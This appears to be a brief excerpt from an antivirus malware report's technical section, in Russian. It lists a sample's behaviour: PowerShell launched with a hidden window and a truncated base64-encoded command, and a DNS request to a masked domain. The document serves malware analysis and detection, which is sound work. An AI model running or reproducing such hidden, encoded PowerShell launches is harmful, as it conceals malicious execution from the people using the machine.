Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACgAIgB7ADEAMAA5AH0AewA4ADcAfQB7ADMAOQB9AHsAMwAzAH0AewA5ADAAfQB7ADgAMQB9AHsANgAwAH0AewA5ADUAfQB7ADEAMAA4AH0AewA1ADUAfQB7ADcANQB9AHsAMgA4AH0AewAzADEAfQB7ADIAOQB9AHsAOQ...
- DNS ASK fq###w4d4.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACgAIgB7ADEAMAA5AH0AewA4ADcAfQB7ADMAOQB9AHsAMwAzAH0AewA5ADAAfQB7ADgAMQB9AHsANgAwAH0AewA5ADUAfQB7ADEAMAA4AH0AewA1ADUAfQB7ADcANQB9AHsAMgA4AH0AewAzADEAfQB7ADIAOQB9AHsAOQ...' (со скрытым окном)